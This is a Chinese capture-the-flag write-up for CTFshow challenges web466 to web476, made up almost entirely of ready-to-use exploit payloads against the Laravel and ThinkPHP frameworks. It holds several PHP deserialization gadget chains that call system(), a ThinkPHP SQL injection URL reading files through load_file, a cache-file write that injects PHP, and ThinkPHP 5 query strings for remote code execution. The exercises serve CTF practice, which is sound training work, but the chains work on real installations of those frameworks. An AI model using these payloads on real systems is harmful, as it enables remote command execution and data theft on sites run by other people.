CTFSHOW框架复现篇

web466

反序列化格式 /admin/序列化串base64

参考文章
https://xz.aliyun.com/t/11002
payload

<?php
namespace Illuminate\Validation {
    class Validator {
       public $extensions = [];
       public function __construct() {
            $this->extensions = ['' => 'system'];
       }
    }
}

namespace Illuminate\Broadcasting {
    use  Illuminate\Validation\Validator;
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Validator();
            $this->event = $cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

web467

参考文章https://xz.aliyun.com/t/9478

<?php
namespace Illuminate\Broadcasting
{
    use  Illuminate\Events\Dispatcher;
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}


namespace Illuminate\Events
{
    class Dispatcher
    {
       protected $listeners;
       public function __construct($event){
           $this->listeners=[$event=>['system']];
       }
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

web468

参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html

<?php
namespace Illuminate\Broadcasting
{
	use Illuminate\Notifications\ChannelManager;
	class PendingBroadcast
	{
		protected $events;
		public function __construct($cmd)
		{
			$this->events = new ChannelManager($cmd);
		}
	}
	$seri = new PendingBroadcast('cat /flag');
	echo base64_encode(serialize($seri));
}

namespace Illuminate\Notifications
{
	class ChannelManager
	{
		protected $app;
		protected $defaultChannel;
		protected $customCreators;
		public function __construct($cmd)
		{
			$this->defaultChannel = 'yu22x';
			$this->customCreators = array('yu22x' => 'system'); 
			$this->app = $cmd;
		}
	}
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

发送payload后看下源代码即可。

web469|web470

参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html

<?php
namespace Illuminate\Broadcasting
{
	use Faker\ValidGenerator;
	class PendingBroadcast
	{
		protected $events;
		public function __construct($cmd)
		{
			$this->events = new ValidGenerator($cmd);
		}
	}
	$seri = new PendingBroadcast('cat /flag');
	echo base64_encode(serialize($seri));
}

namespace Faker
{
	use Faker\DefaultGenerator;
	class ValidGenerator
	{
		protected $maxRetries;
		protected $validator;
		protected $generator;
		public function __construct($cmd)
		{
			$this->generator = new DefaultGenerator($cmd);
			$this->maxRetries = 10000000;
			$this->validator = 'system';
		}
		
	}
}

namespace Faker
{
	class DefaultGenerator
	{
		protected $default;
		public function __construct($cmd)
		{
			$this->default = $cmd;
		}
	}
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

web471

参考文章http://www.136.la/jingpin/show-180114.html#POC1_46

<?php
namespace Illuminate\Broadcasting
{
    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct()
        {
            $this->events = new Dispatcher();
            $this->event = new QueuedCommand();
        }

    }
}

namespace Illuminate\Foundation\Console
{
    class QueuedCommand
    {
        public $connection = 'cat /flag';
    }
}

namespace Illuminate\Bus
{

    class Dispatcher
    {
        protected $queueResolver;

        public function __construct()
        {
            $this->queueResolver='system';
        }

    }
}

namespace
{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo base64_encode(serialize(new PendingBroadcast()));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

web472

参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
payload

<?php
namespace Illuminate\Broadcasting{
 
use Illuminate\Contracts\Events\Dispatcher;
 
class PendingBroadcast
{
 protected $event;
 protected $events;
    public function __construct($events, $event)
    {
        $this->event = $event;
        $this->events = $events;
    }
}
}
namespace Illuminate\Bus{
class Dispatcher
{
 protected $queueResolver;
    public function __construct($queueResolver)
    {
        $this->queueResolver = $queueResolver;
    }
 
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
 public $connection;
 public function __construct($connection)
    {
        $this->connection = $connection;
    }
  }
}
namespace{
 $c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
 $a = new Illuminate\Bus\Dispatcher('system');
 $b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
 echo base64_encode(serialize($b));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

web473

参考文章https://www.cnblogs.com/litlife/p/11273652.html
试了几个报错函数 ，其中exp可用。
payload
index.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1

web474

参考文章https://blog.csdn.net/rfrder/article/details/114599310

public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
接着访问
runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php

1
2
3
4

web475

s=cat /flag&_method=__construct&method=POST&filter[]=system

aaaa=cat /flag&_method=__construct&method=GET&filter[]=system

_method=__construct&method=GET&filter[]=system&get[]=cat /flag

c=cat /flag&f=calc&_method=filter
1
2
3
4
5
6
7

web476

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
1
2
3
4
5